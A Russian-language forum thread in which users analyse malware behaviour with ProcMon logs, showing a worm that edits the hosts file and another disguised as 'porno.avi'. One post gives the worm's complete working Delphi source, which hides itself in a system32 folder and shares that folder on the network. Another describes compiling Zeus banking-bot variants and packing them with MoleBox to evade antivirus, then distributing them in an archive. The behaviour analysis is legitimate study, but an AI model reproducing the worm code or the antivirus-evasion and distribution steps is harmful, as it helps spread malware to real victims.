Анализ вирусов посредством ProcMon и ProcExp

[lyolik]

Очень познавательный и серьёзный топик с грамотным анализом. Спасибо модемщик'у.

P.S
0eck,DeRo
Изюминка топика,это анализ и поведение вирусов, а не банальное сканированием AV с последующими скриншотами, считаю подобное лишним и мало интересным.

 

[модемщик]

Это мусорный червь, загаживает диски C, D,..., далее блокирует доступ к сайтам популярных антивирусов, для верности сделал добавление в автозагрузку пользователя, это expl0re1.exe и ещё один екзешник, добавляется в реестр автозагрузку для всех пользователей, название екзешника не помню, но название сделал похожим на explorer.exe или svchost, не помню уже...

Далее этот вирус заражает все exe файлы на компе...

А как ты его запустил ?

У меня максимум, что он смог сделать, это заблокировать доступ к антивирусам, путём модификации hosts !

Ну, в автозагрузку он добавится не смог, не нашел :)
Date & Time: 11.05.2013 22:24:53
Event Class: File System
Operation: CreateFile
Result: PATH NOT FOUND
Path: C:\PROGRA~2\ГЛАВНО~1\ПРОГРА~1\АВТОЗА~1\EXP10RE1.EXE
TID: 2800
Duration: 0.0000110
Desired Access: Generic Read/Write
Disposition: Open
Options: Synchronous IO Non-Alert, Non-Directory File, Disallow Exclusive
Attributes: n/a
ShareMode: Read, Write, Delete
AllocationSize: n/a
Файл хост он почему то решил записать не в drivers, а в system32 :)

Date & Time: 11.05.2013 22:24:53
Event Class: File System
Operation: CreateFile
Result: NAME NOT FOUND
Path: C:\Windows\System32\HOSTS
TID: 2800
Duration: 0.0000127
Desired Access: Generic Read, Write Attributes
Disposition: Open
Options: Synchronous IO Non-Alert, Non-Directory File, Disallow Exclusive
Attributes: n/a
ShareMode: Read, Write, Delete
AllocationSize: n/a


А запускал я его от имени администратора.

 

[X-Shar]

Win32.HLLP.Neshta (или подобный червь)

Ну то, что его детектит оно и понятно, т.к. я структуру зверька не менял, а сам вирус старый !

Меня больше всего напрягает, то, что в Делфи по умолчанию, после компиляции идёт сразу запуск файла, так, что я его из-за головотяпства запустил у себя после компиляции !

Сделал восстановление системы, сейчас Dr.Web CureIt! проверяю, для верности...

 

[модемщик]

Ну то, что его детектит оно и понятно, т.к. я структуру зверька не менял, а сам вирус старый !

Меня больше всего напрягает, то, что в Делфи по умолчанию, после компиляции идёт сразу запуск файла, так, что я его из-за головотяпства запустил у себя после компиляции !

Сделал восстановление системы, сейчас Dr.Web CureIt! проверяю, для верности...

Хы.
Сейчас кстати посмотрю, что за червь получился.



ЗЫ:
Народ, у кого есть свежие боевые вирусы, не стесняйтесь, выкладывайте.
ЗЫЗЫ: Червей больше не надо.

 

[0eck]

Хы.
Сейчас кстати посмотрю, что за червь получился.



ЗЫ:
Народ, у кого есть свежие боевые вирусы, не стесняйтесь, выкладывайте.
ЗЫЗЫ: Червей больше не надо.

Тебе здесь работы непочатый край
http://ru-sfera.pw/threads/Тесты-ан...-очень-опасных-вирусах.629/page-95#post-25660

 

[модемщик]

Тебе здесь работы непочатый край
http://ru-sfera.pw/threads/Тесты-антивирусов-на-боевых-и-очень-опасных-вирусах.629/page-95#post-25660

Там слишком много всего, а я во времени ограничен.
Интересует прежде всего те, которые максимально распространены, хит-парад короче.

 

[модемщик]

Анализ вредоносной программы в архиве porno.avi.rar,
Worm.Siggen.6852 (По классификации Dr.web)
Исходные данные:
ОС Win7 ult x32
Версия ОС: 6.1.7601 Service Pack 1 сборка 7601
Установленные обновления:
Definition Update for Windows Defender - KB915597 (Definition 1.149.1652.0)Включен UAC на максимальный уровень, работа ведется от администратора.

Вирус начал бодренько, попытался записать себя на в корне диска С
Но сработал UAC и файл отправился в виртуальное пространство.

Date & Time: 12.05.2013 13:03:08
Event Class: File System
Operation: CreateFile
Result: REPARSE
Path: C:\p.avi
TID: 1856
Duration: 0.0001733
Desired Access: Generic Write, Read Attributes
Disposition: OverwriteIf
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: Read
AllocationSize: 0
OpenResult: Superseded
Date & Time: 12.05.2013 13:03:08
Event Class: File System
Operation: CreateFile
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\VirtualStore\p.avi
TID: 1856
Duration: 0.0001842
Desired Access: Generic Write, Read Attributes
Disposition: OverwriteIf
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: Read
AllocationSize: 0
OpenResult: Created

Следующим шагом вируса стала попытка изменить ассоциации к файлам .avi
Вышло успешно, но в виртаульном пространстве гы.

Date & Time: 12.05.2013 13:03:08
Event Class: Registry
Operation: RegEnumValue
Result: SUCCESS
Path: HKCR\.avi\OpenWithProgIds
TID: 2768
Duration: 0.0000028
Index: 0
Length: 220

Далее вирус попытался записать создать директорию
C:\Windows\system32\prn_
Опять же в виртуальном пространстве :)

Date & Time: 12.05.2013 13:03:10
Event Class: File System
Operation: CreateFile
Result: REPARSE
Path: C:\Windows\System32\prn_
TID: 1856
Duration: 0.0016091
Desired Access: Read Data/List Directory, Synchronize
Disposition: Create
Options: Directory, Synchronous IO Non-Alert, Open Reparse Point
Attributes: N
ShareMode: Read, Write
AllocationSize: 0
OpenResult: Superseded

Следующим шагом вирус запустил attrib.exe +h +s +a +r C:\Windows\system32\prn_
(установка атрибутов: архивный, скрытый, только для чтения, системный)

Date & Time: 12.05.2013 13:03:10
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\attrib.exe
TID: 1856
Duration: 0.0000000
PID: 3156
Command line: attrib +h +s +a +r C:\Windows\system32\prn_

Следующий шаг - запись себя в папку C:\Windows\system32\prn_
ну вы поняли.

Date & Time: 12.05.2013 13:03:10
Event Class: File System
Operation: CreateFile
Result: ACCESS DENIEDPath: C:\Windows\system32\prn_\porno.avi.exe
TID: 1856
Duration: 0.0000593
Desired Access: Generic Write, Read Data/List Directory, Read Attributes, Delete
Disposition: OverwriteIf
Options: Sequential Access, Non-Directory File
Attributes: A
ShareMode: None
AllocationSize: 0

И последний шаг - расшаривание папки C:\Windows\system32\prn_ под именем porno
гы гы гы.

Date & Time: 12.05.2013 13:03:10
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 1856
Duration: 0.0000000
PID: 3996
Command line: net share porno=C:\Windows\system32\prn_

Резюме:
Вирус смешной, но к сожаление включенный UAC запорол бедняге всё счастье.
Опасности почьи не представляет.Правда должен прекрасно распространяться в локальных сетях всяческих учебных заведений, и т.д.
Лечение: в нашем случае не требуется.

 

[X-Shar]

Опасности почьи не представляет.Правда должен прекрасно распространяться в локальных сетях всяческих учебных заведений, и т.д.

Автор создавал этот вирус как-раз в качестве шутки в институте...

Вот его код на делфи, спасибо за анализ, всё именно так и происходит как написанно:

Спойлер

Скопировать в буфер обмена

{ всем студентам поймавшим эту гадость ОГРОМНЫЙ ПРИВЕТ }
 
program porno;
 
uses Forms, Registry, Windows, Classes, SysUtils, shellapi;
 
var
  sdir : Array[0..260] of char;
  t:textfile;
Type
PUSER_INFO_11 = ^USER_INFO_11;
_USER_INFO_11 = Record
  usri11_name: LPWSTR;
  usri11_comment: LPWSTR;
  usri11_usr_comment: LPWSTR;
  usri11_full_name: LPWSTR;
  usri11_priv: DWORD;
  usri11_auth_flags: DWORD;
  usri11_password_age: DWORD;
  usri11_home_dir: LPWSTR;
  usri11_parms: LPWSTR;
  usri11_last_logon: DWORD;
  usri11_last_logoff: DWORD;
  usri11_bad_pw_count: DWORD;
  usri11_num_logons: DWORD;
  usri11_logon_server: LPWSTR;
  usri11_country_code: DWORD;
  usri11_workstations: LPWSTR;
  usri11_max_storage: DWORD;
  usri11_units_per_week: DWORD;
  usri11_logon_hours: Pointer;
  usri11_code_page: DWORD;
End;
USER_INFO_11=_USER_INFO_11;
 
{$R porno.res}
 
Function NetUserGetInfo (
  servername: LPWSTR; username: LPWSTR;
  level: DWORD; bufptr: Pointer
): DWord; stdcall; external 'netapi32.dll';
 
Function NetApiBufferFree(
  Buffer: Pointer
): DWORD; stdcall; external 'netapi32.dll';
 
function isAdmin:Boolean;
Var
login: PWideChar;
info: PUSER_INFO_11;
size : Cardinal;
Begin
Result:=false;
info:=nil;
 
// Получаем логин пользователя, запустившего программу
size:=0;
login:=nil;
GetUserNameW (login, size);
 
// Выделяем память для переменных
GetMem (login,SizeOf (WideChar) * size);
GetUserNameW (login, size);
// Получаем информацию о пользователе
if NetUserGetInfo (Nil, login, 11, @info)=0
  then  // Определяем наличие административных привилегий
  if Info.usri11_priv=2
	then Result:=true;
 
if info<>nil
  then NetApiBufferFree( info );
FreeMem (login);
End;
 
begin
  // создаем оводку глаз
  assignfile(t,'c:\p.avi');
  rewrite(t);
  closefile(t);
  // запускаем плеер ассоциированный с avi файлами
  shellexecute(Application.Handle, nil, 'c:\p.avi', nil, nil, SW_SHOW);
  //если не админ то дальше делать нечего :)
  if not isAdmin then exit;
  //создаем папку prn_ в папке винды
  GetSystemDirectory(sdir, sizeof(sdir));
  createdir(sdir+'\prn_');
  //устанавливаем ее атрибуты
  winexec(pchar('attrib +h +s +a +r '+sdir+'\prn_'),0);
  //копируем себя в эту папку
  copyfile(pchar(Application.ExeName),pchar(sdir+'\prn_\porno.avi.exe'), false);
  //и расшариваем :) все просто как огурец
  winexec(pchar('net share porno='+sdir+'\prn_'),0);
  //дохнем
  halt;
end.

 

[DeRo]

Очень познавательный и серьёзный топик с грамотным анализом. Спасибо модемщик'у.

P.S
0eck,DeRo
Изюминка топика,это анализ и поведение вирусов, а не банальное сканированием AV с последующими скриншотами, считаю подобное лишним и мало интересным.

Я просто не обратил внимание, что это другой топик :)
А так согласен, интересный топик!!!

 

[X-Shar]

Для теста откомпилировал и закриптовал бота Зевс, для справки:http://ru-sfera.pw/threads/Исходник-вируса-zeus-2-0-8-9.59/ в архиве 7-мь ботов различной модификации и настройками bot1, bot2, bot3 это стандартные настройки от автора + различные методы обхода UAC, botFinall это мой бот с моими корректировками в настройках.

Что делаю дальше:

Дальше, для того-чтобы обойти большинство антивирусов, использую упаковщик MoleBox:

bot5, bot56, botFinallMB это закриптованные в MoleBox, по идеи их не должен обнаруживать антивирус !:)

Единственное, при запуске закриптованных файлов вылезет такое окно:

Кто будет тестить, нажимайте "Да", это сообщение появляется, т.к. я использовал демо версию MoleBox, если-бы я её купил (активировал !:)), то этого окошка не было-бы !


ВАЖНО:ВСЯ ЭТА ИНФА ДЛЯ ОЗНАКОМЛЕНИЯ И ТЕСТА, ЗА ИСПОЛЬЗОВАНИЕ ОТВЕТСТВЕННОСТИ НЕ НЕСУ !!!!!

ПАРОЛЬ:111